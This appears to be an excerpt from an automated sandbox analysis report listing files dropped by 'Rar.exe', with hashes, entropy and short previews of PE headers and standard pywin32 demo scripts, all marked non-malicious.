                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)p..)p..)p..Q...)p.\q..)p..Bq..)p.\u..)p.\t..)p.\s..)p.4\q..)p.R@q..)p..)q.)p.4\y..)p.4\p..)p.4\r..)p.Rich.)p.........................PE..L......d...........!....."... ......u!.......@............................................@..........................I..P....I..x....p..\.......................D....D..T............................D..@............@..$............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........`.......8..............@....rsrc...\....p.......<..............@..@.reloc..D............@..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                                                                                  Entropy (8bit):6.0706493448180305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:K/m+OllJEdSFcReeELPXFriF5pERpxx2HvLD:qm+OVeExuF5pERpxUL
                                                                                                                                                                                                                                  MD5:F816A7D3E94862696A44B6369DFB2EA9
                                                                                                                                                                                                                                  SHA1:8852284DC02612F83AA4066564F16D803CF9749B
                                                                                                                                                                                                                                  SHA-256:00F11A5A963F930A263D866A2B6414B3835A51E9C3EC91AAD0668B9E14BF50E6
                                                                                                                                                                                                                                  SHA-512:FAE02DDAB39E207087ED89FEF50ECA368DEBB22D2EAC6D4268AC1F53C6D64C3E516CDB4A23FDC1649860C2EDCCEC44DEDED84A2F0BE7A7FC5C7EC1501FE60F2F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C. .".s.".s.".s.ZKs.".s.W.r.".s.W.r.".s.W.r.".s.W.r.".s.W.r.".spK.r.".s.I.r.".s.".sP".s.W.r.".s.W.r.".s.W.r.".sRich.".s................PE..L......d...........!.....L...6.......M.......`............................................@......................... r..H...hr..........L.......................L...4l..T............................l..@............`..<............................text...+K.......L.................. ..`.rdata.......`... ...P..............@..@.data...l............p..............@....rsrc...L............x..............@..@.reloc..L............|..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23040
                                                                                                                                                                                                                                  Entropy (8bit):5.7004102661011204
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ni14OW/KNbivlL7p95MlMHMyM60QYMuVGSLNpuKMjwaahTO3KBQ77d1qGQCilGN:COKNAlL7VMlMHMyM60QYMu8SZpuiRVey
                                                                                                                                                                                                                                  MD5:1DBE59165907DA9B1EB6CFD713D12B00
                                                                                                                                                                                                                                  SHA1:7EDD94FFCB589CB68D33125ADC3AF3F7A0D82C41
                                                                                                                                                                                                                                  SHA-256:E0E5897DC50BBF76DD32730216992FF402A799ED0FF8DF338F6CDF59C385348B
                                                                                                                                                                                                                                  SHA-512:B135532F44B4E1F945BD24ABE559A120CE37F06BB75300540C852D71BC22F214323C2B96E103C5C862F8E396C1933A4150A06BF3B33EBD8F295C600EBDE81F44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R"K..C%_.C%_.C%_.;._.C%_D6$^.C%_.($^.C%_D6 ^.C%_D6!^.C%_D6&^.C%_.6$^.C%_.*$^.C%_.C$_RC%_.6,^.C%_.6%^.C%_.6'^.C%_Rich.C%_........................PE..L......d...........!.........(......v*.......@............................................@..........................M..P...@N.......p..T.......................(....G..T...........................`G..@............@..,............................text...3,.......................... ..`.rdata..d....@.......2..............@..@.data...t....`.......J..............@....rsrc...T....p.......P..............@..@.reloc..(............T..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                  Entropy (8bit):5.519899099469349
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:6V8rwsZ9DOOAXldyxfF6jdeq75G3hOO/pOFK9:6VZvldyHS74PhO49
                                                                                                                                                                                                                                  MD5:08B864ADB87687152CD57999ABD5FE1A
                                                                                                                                                                                                                                  SHA1:3F3EF6CBEDC9E8E22ECF573F3D00DB889C61FA0D
                                                                                                                                                                                                                                  SHA-256:D49156080F394B23CC595AB6630125A20BAF16F2B8904B3133987D4F3F18B9DC
                                                                                                                                                                                                                                  SHA-512:6119F3A3CCCEF5921376665007C37893023D896DEEF09C98BD76EC44E1588A51F8A953126F0163669F71F46EC6C8CF484A427EC1BC0BF08F73656898D7880E4E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......yt.T=...=...=...4m..9...o`..?...o`..7...o`..7...o`..<...)~..8...=........`..<....`..<....`|.<....`..<...Rich=...................PE..L......d...........!................k .......0...............................p............@.........................@7.......7..x....P..,....................`......02..T............................2..@............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....rsrc...,....P.......2..............@..@.reloc.......`.......<..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17408
                                                                                                                                                                                                                                  Entropy (8bit):5.441828005763723
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:XeJOXLVXp5ftMPeG6pPjf374xkLn2JxbRqDNIhl:Xe8X/BtMWG6pz37eYSFRqDNIh
                                                                                                                                                                                                                                  MD5:78F6F257CF3AA97F4261749A37968A5F
                                                                                                                                                                                                                                  SHA1:7A6F6DB50ECB6EA66DF5A12EBF282682EC634453
                                                                                                                                                                                                                                  SHA-256:E753C57CC2F31A888BAF162EB9B28C771BDFABFCE5AB977969EE7D957DD5270B
                                                                                                                                                                                                                                  SHA-512:A0A177AE9E98C6FA5C95666D2359E29107EAFBB12483B073CBFF1E42854A979E42D8B49780F536B906D15AF83809780B0C805B11A4D0CB0BE5A704B75BC184C5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.....\...\...\.rj\...\...]...\...]...\...]...\...]...\...]...\.c.]...\.a.]...\...\...\...]...\...\...\...]...\Rich...\........................PE..L...,..d....................."...............0....@.......................................@..................................9.......`.......................p..L....4..T...........................P5..@............0...............................text...3........................... ..`.rdata..8....0......."..............@..@.data........P.......8..............@....rsrc........`.......<..............@..@.reloc..L....p.......@..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18043
                                                                                                                                                                                                                                  Entropy (8bit):4.297873544548919
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:iCQsViutcVu/s7ncf1wqad7fOXuH+nUpTr4:iC7GcTad7fOXuH+nM4
                                                                                                                                                                                                                                  MD5:4FC327FDD744665C26F3E21B58E3D385
                                                                                                                                                                                                                                  SHA1:C1B6060579286A5695870769547244211DE35794
                                                                                                                                                                                                                                  SHA-256:511A0E1F785C7643E8FF535245A3F0710005F161A5428D522E352D760C102393
                                                                                                                                                                                                                                  SHA-512:13AFDE4113282AF90B53D1E597749777F3B3FA6C9BB268B80398D5B878AA41D9B44D31E2D310E24CCA025A919E707B37E41F5EE6611D327C9522B680DD3F89C6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ControlService.py.#.# A simple app which duplicates some of the functionality in the.# Services applet of the control panel..#.# Suggested enhancements (in no particular order):.#.# 1. When changing the service status, continue to query the status.# of the service until the status change is complete. Use this.# information to put up some kind of a progress dialog like the CP.# applet does. Unlike the CP, allow canceling out in the event that.# the status change hangs..# 2. When starting or stopping a service with dependencies, alert.# the user about the dependent services, then start (or stop) all.# dependent services as appropriate..# 3. Allow toggling between service view and device view.# 4. Allow configuration of other service parameters such as startup.# name and password..# 5. Allow connection to remote SCMs. This is just a matter of.# reconnecting to the SCM on the remote machine; the rest of the.# code should still work the same..# 6. Either implement the startup parameter
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2789
                                                                                                                                                                                                                                  Entropy (8bit):4.683118967004213
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:CUAgR5xR8uwd8pI8Q5IqnA3aze4v2EaXBbKzaIOZ4KKi5XMK7c:CVgRp8uwd8pI8QSh3aze4v2EaxbKPOZS
                                                                                                                                                                                                                                  MD5:A84154C766E7562DA3A8FBA7352394A5
                                                                                                                                                                                                                                  SHA1:2F865533CE526A05C840CF3AE13A24364F9763BE
                                                                                                                                                                                                                                  SHA-256:2851E3C6A67762E73A406A95EC6BFC0C8326D4F6C24271CD089853368A86518A
                                                                                                                                                                                                                                  SHA-512:AA3323C9D3004AF8F51EC20EAFCB61CA41701B49845CDDA40D2C753D35980DB77243DCF15DACE8B63750D083DED600CACB659FC64BFF38A9035F4BB07AC7AEAC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# BrandProject.py.#.# Brand a VSS project with a "build number", then optionally.# stamp DLL/EXE files with version information...import os.import string.import sys..import bulkstamp.import vssutil.import win32api...def BrandProject(. vssProjectName,. descFile,. stampPath,. filesToSubstitute,. buildDesc=None,. auto=0,. bRebrand=0,.):. # vssProjectName -- The name of the VSS project to brand.. # descFile -- A test file containing descriptions of the files in the release.. # stampPath -- The full path to where the files referenced in descFile can be found.. path = win32api.GetFullPathName(stampPath).. build = vssutil.MakeNewBuildNo(vssProjectName, buildDesc, auto, bRebrand). if build is None:. print("Cancelled"). return.. bulkstamp.scan(build, stampPath, descFile). for infile, outfile in filesToSubstitute:. SubstituteVSSInFile(vssProjectName, infile, outfile). return 1...def usage(msg):. print(msg). print(.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4207
                                                                                                                                                                                                                                  Entropy (8bit):4.3918564406115115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:JJUsZxWPFVUfLIwJg+0L+0fy94bB1G+x3qafWWlxx84V1Hzvqs:JJVxWDUBJR0L+B4jGZafWWrx3Hzvqs
                                                                                                                                                                                                                                  MD5:3DAF8F9FB9BE8BBE4AF313F518CECDEF
                                                                                                                                                                                                                                  SHA1:743AFB529F2798F0CF774FB451BF8BFD83AC261A
                                                                                                                                                                                                                                  SHA-256:76A2C2F847AF7D90ABA65C5F39306E23551F52F2FB7686CF45AB3F4E6C96F635
                                                                                                                                                                                                                                  SHA-512:DBAAED775B3F922A2F2B09EC57DABC8D0F3C8E8DC66317407D882550C58F077720F05AECDCDBAE9A2FA997CCE733A84D7B9F880C64F2791E58C5A8BED31BDD9F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# bulkstamp.py:.# Stamp versions on all files that can be found in a given tree..#.# USAGE: python bulkstamp.py <version> <root directory> <descriptions>.#.# Example: python bulkstamp.py 103 ..\win32\Build\ desc.txt.#.# <version> corresponds to the build number. It will be concatenated with.# the major and minor version numbers found in the description file..#.# Description information is pulled from an input text file with lines of.# the form:.#.# <basename> <white space> <description>.#.# For example:.#.# PyWinTypes.dll Common types for Python on Win32.# etc.#.# The product's name, major, and minor versions are specified as:.#.# name <white space> <value>.# major <white space> <value>.# minor <white space> <value>.#.# The tags are case-sensitive..#.# Any line beginning with "#" will be ignored. Empty lines are okay..#..import fnmatch.import os.import sys..import verstamp.import win32api..numStamped = 0..g_patterns = [. "*.dll",. "*.pyd",. "*.exe",.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5690
                                                                                                                                                                                                                                  Entropy (8bit):4.631936788839383
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:i7w5LSUoVs8wS87n/R2QXfPAEdr3wUsUt2DUxY2dcXTl3UVTRgtjkzFidMl0+xK3:IUobwSan/R2QxdhpxVqXREVTeqc+xaB
                                                                                                                                                                                                                                  MD5:CAEB3C147B18ED16091C79BED0124013
                                                                                                                                                                                                                                  SHA1:AF38CCF2C2D6B612BB236A741349BAEC414553F1
                                                                                                                                                                                                                                  SHA-256:29D4CAC8631D01D1ABFDFDF26B8DEE88EF22EBEF484C50238BCAC8DF1FEAD2CC
                                                                                                                                                                                                                                  SHA-512:1C4BA38FBCA369E1E1375C250FD619C45895AB06ED9417053A8CAC5059176F54C126BC61AF7F3D3A3B100FBAA7B5862F307B475F7F184DD960092B3D5A414D7A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import string.import time.import traceback..import pythoncom.import win32com.client.import win32com.client.gencache.import win32con..constants = win32com.client.constants..win32com.client.gencache.EnsureModule("{783CD4E0-9D54-11CF-B8EE-00608CC9A71F}", 0, 5, 0)..error = "vssutil error"...def GetSS():. ss = win32com.client.Dispatch("SourceSafe"). # SS seems a bit weird. It defaults the arguments as empty strings, but. # then complains when they are used - so we pass "Missing". ss.Open(pythoncom.Missing, pythoncom.Missing, pythoncom.Missing). return ss...def test(projectName):. ss = GetSS(). project = ss.VSSItem(projectName).. for item in project.GetVersions(constants.VSSFLAG_RECURSYES):. print(item.VSSItem.Name, item.VersionNumber, item.Action)...# .item=i.Versions[0].VSSItem.# .for h in i.Versions:.# ..print `h.Comment`, h.Action, h.VSSItem.Name...def SubstituteInString(inString, evalEnv):. substChar = "$". fields = string.split(inString, substChar)
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1268
                                                                                                                                                                                                                                  Entropy (8bit):4.508504303752949
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:8FWqM5oI3Zqiiko/B/cdyXKe1KLEnK4mnR3YvUN84+JApAtGh:Tq4oI3YuSVW7e1K4lmnRpN8JJAuM
                                                                                                                                                                                                                                  MD5:3DE21CB285822AB13A643A67AE18808E
                                                                                                                                                                                                                                  SHA1:70EAD65A85909EDAD23FA14EA2A6FBAF4F798BA1
                                                                                                                                                                                                                                  SHA-256:9AFCB5B2D0C07224554E5A1B2DD0954092A09AE1B30824376CBD29CEA44340E4
                                                                                                                                                                                                                                  SHA-512:50EF3A5013DB970DAAE33AA57A752F6036CEC7B99012E9436C8E5A1517BE5A676EF820CDDFA80DC22C9ABA7451739AE96039E7A0A534BA173BAC24CC9F7C7FB6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generate a base file name.import os.import time..import win32api.import win32evtlog...def BackupClearLog(logType):. datePrefix = time.strftime("%Y%m%d", time.localtime(time.time())). fileExists = 1. retry = 0. while fileExists:. if retry == 0:. index = "". else:. index = "-%d" % retry. try:. fname = os.path.join(. win32api.GetTempPath(),. "%s%s-%s" % (datePrefix, index, logType) + ".evt",. ). os.stat(fname). except os.error:. fileExists = 0. retry = retry + 1. # OK - have unique file name.. try:. hlog = win32evtlog.OpenEventLog(None, logType). except win32evtlogutil.error as details:. print("Could not open the event log", details). return. try:. if win32evtlog.GetNumberOfEventLogRecords(hlog) == 0:. print("No records in event log %s - not backed up" % logType). return. win32e
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8273
                                                                                                                                                                                                                                  Entropy (8bit):4.506389676116937
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:jb+gnqVXwnUVqIAbmz/BiN0ldUGCIp7BwVy1Hu/3w8Ed6ZJvQPsrQyKrztxPbHAT:2oaS0zT0fEd62ZhsqdSxmS+S+vUHkHi
                                                                                                                                                                                                                                  MD5:8AE8F1287D1CA8C90E8041E451510529
                                                                                                                                                                                                                                  SHA1:A345CF8CD0F4D2D102F1312E99EA12161EBE3709
                                                                                                                                                                                                                                  SHA-256:36F8729DBF8A7B648F4392875EF310DD1EC6F670F51219DD7876C67C941F0509
                                                                                                                                                                                                                                  SHA-512:215573442BCEB635CF5EECBA1912EECE075CD849125446E58DAC8443A264FC13C5374F99F1C7C83CA42839E8A7202B34B6591AD825757378917A67453914ACB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Simple CE synchronisation utility with Python features...import fnmatch.import getopt.import os.import string.import sys..import win32api.import win32con.import win32file.import wincerapi...class InvalidUsage(Exception):. pass...def print_error(api_exc, msg):. hr, fn, errmsg = api_exc. print("%s - %s(%d)" % (msg, errmsg, hr))...def GetFileAttributes(file, local=1):. if local:. return win32api.GetFileAttributes(file). else:. return wincerapi.CeGetFileAttributes(file)...def FindFiles(spec, local=1):. if local:. return win32api.FindFiles(spec). else:. return wincerapi.CeFindFiles(spec)...def isdir(name, local=1):. try:. attr = GetFileAttributes(name, local). return attr & win32con.FILE_ATTRIBUTE_DIRECTORY. except win32api.error:. return 0...def CopyFileToCe(src_name, dest_name, progress=None):. sh = win32file.CreateFile(. src_name, win32con.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None. ).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1994
                                                                                                                                                                                                                                  Entropy (8bit):4.626371651169389
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:ZIaltbtF61tB8UbtsTIgP70kWkHDHbJTJngTlM0yvVDb6kXi4GdUe:5DFqmssEgP7TbbJTJH0gfTXi4Pe
                                                                                                                                                                                                                                  MD5:CF3D42D61D5ABEA7E4F7AC5279237F75
                                                                                                                                                                                                                                  SHA1:670323D1F0651A3800E503E058D6734A7683FA2B
                                                                                                                                                                                                                                  SHA-256:DAC26F4040B87A3D9E8A49EE4A08696A280EBC9710E39B98C576B7E322002DF8
                                                                                                                                                                                                                                  SHA-512:5F655E0A28FFC6FD73628F7A9068875CACBBF66193CDE7C3CEB162164BACD152C5CB9DD8A777550312A95F4EB984933CDA8B9B49CBAAFACAEADAB725C9DC2721
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Kills a process by process name.#.# Uses the Performance Data Helper to locate the PID, then kills it..# Will only kill the process if there is only one process of that name.# (eg, attempting to kill "Python.exe" will only work if there is only.# one Python.exe running. (Note that the current process does not.# count - ie, if Python.exe is hosting this script, you can still kill.# another Python.exe (as long as there is only one other Python.exe)..# Really just a demo for the win32pdh(util) module, which allows you.# to get all sorts of information about a running process and many.# other aspects of your system...import sys..import win32api.import win32con.import win32pdhutil...def killProcName(procname):. # Change suggested by Dan Knierim, who found that this performed a. # "refresh", allowing us to kill processes created since this was run. # for the first time.. try:. win32pdhutil.GetPerformanceAttributes("Process", "ID Process", procname). except:. p
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2722
                                                                                                                                                                                                                                  Entropy (8bit):4.5589989171602765
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:XdgqmyiL1X69f0+FaGtOJ/kpZAbAKSck7/zir0/PNX/hJyJPrdby8pFdfeg79yGT:XdgqZiL1K9xFnprAbA8k7/zt/VX/hqrF
                                                                                                                                                                                                                                  MD5:11B0D54C2FF5F7A09F058B2F0007E51C
                                                                                                                                                                                                                                  SHA1:5B7DBCC531E668CED8A64E77E8B3ECAEA74F1EFF
                                                                                                                                                                                                                                  SHA-256:CC4BD24331F177797371A0F6F725F8D370A544B95C9C1471B9CE52D9C7A0BF0D
                                                                                                                                                                                                                                  SHA-512:78829C0E9851BC8D6D44C212BDABE4FD72652EA00F3DE784B8DA8813DD09820D7F6ECB9F1187DB3F11CDF625BF0888A2056978CD0F76CA820852D5B1FEF28F2B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A demo of using the RAS API from Python.import sys..import win32ras...# The error raised if we can not.class ConnectionError(Exception):. pass...def Connect(rasEntryName, numRetries=5):. """Make a connection to the specified RAS entry... Returns a tuple of (bool, handle) on success.. - bool is 1 if a new connection was established, or 0 is a connection already existed.. - handle is a RAS HANDLE that can be passed to Disconnect() to end the connection... Raises a ConnectionError if the connection could not be established.. """. assert numRetries > 0. for info in win32ras.EnumConnections():. if info[1].lower() == rasEntryName.lower():. print("Already connected to", rasEntryName). return 0, info[0].. dial_params, have_pw = win32ras.GetEntryDialParams(None, rasEntryName). if not have_pw:. print("Error: The password is not saved for this connection"). print(. "Please connect manually selecting the 'save
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20460
                                                                                                                                                                                                                                  Entropy (8bit):4.586626567064987
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:fJoTy/B6H8DfSp6KH3O0mV35PPWjvVWC3qxRS:fJoTyJ6HgKXO0U5PPWhqS
                                                                                                                                                                                                                                  MD5:D7E5CFFE47C88CA037338FD94EA1AF5B
                                                                                                                                                                                                                                  SHA1:CD59B2438108227FA97263805B7C4E7D9956B1A5
                                                                                                                                                                                                                                  SHA-256:8A54BCF838F37CB1F49074DC2254AF3EA57926C2ACCD8C5CF201F9C554BD186E
                                                                                                                                                                                                                                  SHA-512:60D03ACE715A73DA2B695BF1B8448A52488D82FDB79CAB48FB4591717C0AD107AA68545B9C240A750728E6BD7FA258BE4C70C1C764EF5CC2FEE425814319676A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A tool to setup the Python registry....class error(Exception):. pass...import sys # at least we can count on this!...def FileExists(fname):. """Check if a file exists. Returns true or false.""". import os.. try:. os.stat(fname). return 1. except os.error as details:. return 0...def IsPackageDir(path, packageName, knownFileName):. """Given a path, a ni package name, and possibly a known file name in. the root of the package, see if this path is good.. """. import os.. if knownFileName is None:. knownFileName = ".". return FileExists(os.path.join(os.path.join(path, packageName), knownFileName))...def IsDebug():. """Return "_d" if we're running a debug version... This is to be used within DLL names when locating them.. """. import importlib.machinery.. return "_d" if "_d.pyd" in importlib.machinery.EXTENSION_SUFFIXES else ""...def FindPackagePath(packageName, knownFileName, searchPaths):. """Find a package.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3500
                                                                                                                                                                                                                                  Entropy (8bit):4.703409335080606
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zz6vYYgifc7r7hVqHUYq6xU9LoJSvkzzgxRqI+ikT8J:zzpT7nhVqjlxU16hzgLqZjT8J
                                                                                                                                                                                                                                  MD5:4F4E28EE25DADE82161FD7FF394CB7B6
                                                                                                                                                                                                                                  SHA1:C37C8B0D10E0C757D1CD44AD1C718C69935416D6
                                                                                                                                                                                                                                  SHA-256:1C286DCFADB16AAEEB70F5D0CB0BCAE51084B00E58228896E1B0FA942A7A5098
                                                                                                                                                                                                                                  SHA-512:F624877D4C8A1CBCAB71FB548071CD06B0C835E4B9B4310540111649B71810AD3F1D56F15A4A54816B91093D6D883D0154C59119172092BF95057A5D2A019CD8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Install and register pythonxx_d.dll, pywintypesxx_d.dll and pythoncomxx_d.dll.#.# Assumes the _d files can be found in the same directory as this script.# or in the cwd...import os.import shutil.import sys.import winreg..import win32api...def usage_and_die(rc):. print(). print("This script is designed to copy and register the Python debug"). print("binaries. It looks for pythonxx_d.dll, pythoncomxx_d.dll etc,"). print("and installs them to work correctly with Python debug builds."). print(). print("You will generally find this script in the. zip file that"). print("included these _d files. Please run this script from"). print("that directory"). sys.exit(rc)...if win32api.__file__.find("_d") > 0:. print("This scripts appears to be running a DEBUG version of Python."). print("Please run it using a normal release build (python.exe)"). usage_and_die(1)..try:. import pythoncom.except ImportError as details:. print("Could not import the release v
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                                                                                  Entropy (8bit):5.766904899896164
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Eus9dTayzceMuRh+0RSRpnR5OXtbvjXObm2PI:k9dD5RHcRpR4tbbXObXPI
                                                                                                                                                                                                                                  MD5:DD419E9F89E8A2815858A8B6D059C027
                                                                                                                                                                                                                                  SHA1:1158C7CD0A7A1298F8DCE6B651814112CCC1456E
                                                                                                                                                                                                                                  SHA-256:CABDFF87D5A1118F16DB1672DEC81394183DC9D644CF98EEFD992F62000BCE83
                                                                                                                                                                                                                                  SHA-512:ADC9D15D3FE7E80E65E2E1D8C026B6CB561A79182F10543A01E91DE33ED36944954BA0458C2FF5115B99AAB1C104E3ADB929184E0A380F3A697A7E5775DD40ED
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T_..51..51..51..M...51.@0..51.@4..51.@5..51.@2..51..@0..51.x\0..51..^0..51..50..51..@8..51..@1..51..@...51..@3..51.Rich.51.........................PE..L...I..d...........!.....<...F......';.......P............................................@.........................pc..`....d..........x.......................t....\..T...........................`\..@............P.. ............................text...z:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....rsrc...x............j..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5471
                                                                                                                                                                                                                                  Entropy (8bit):4.483065386918216
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kC/Zakzv+Hjce4Dr+fYH+M5+PX2cYU/Bi0EBdktW2E9mIq:kNiFxUZcBdktVqq
                                                                                                                                                                                                                                  MD5:9A0B2387B2891F63CAE03C9E2DDC3322
                                                                                                                                                                                                                                  SHA1:963FBED7627CFE59C4223211D3CE115FD0E77849
                                                                                                                                                                                                                                  SHA-256:9A39FCE6B220CC16C66E8C3F0CF599CA8662F2E4EAA3C9B97192417E133C0FBB
                                                                                                                                                                                                                                  SHA-512:CF19F968B5E04B9643EA308A42B624CC5631809440432B4F8C116A648792F4364805DDE07BB5CE271EE0DEDF131A60636FB6A87F9E4C12861F0E85CA407DB478
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import sys.import unittest..import pywintypes.import win32api...# A class that will never die vie refcounting, but will die via GC..class Cycle:. def __init__(self, handle):. self.cycle = self. self.handle = handle...class PyHandleTestCase(unittest.TestCase):. def testCleanup1(self):. # We used to clobber all outstanding exceptions.. def f1(invalidate):. import win32event.. h = win32event.CreateEvent(None, 0, 0, None). if invalidate:. win32api.CloseHandle(int(h)). 1 / 0. # If we invalidated, then the object destruction code will attempt. # to close an invalid handle. We don't wan't an exception in. # this case.. def f2(invalidate):. """This function should throw an IOError.""". try:. f1(invalidate). except ZeroDivisionError as exc:. raise IOError("raise 2").. self.assertRaises(IOError,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4128
                                                                                                                                                                                                                                  Entropy (8bit):4.766945925977974
                                                                                                                                                                                                                                  Encrypted:false
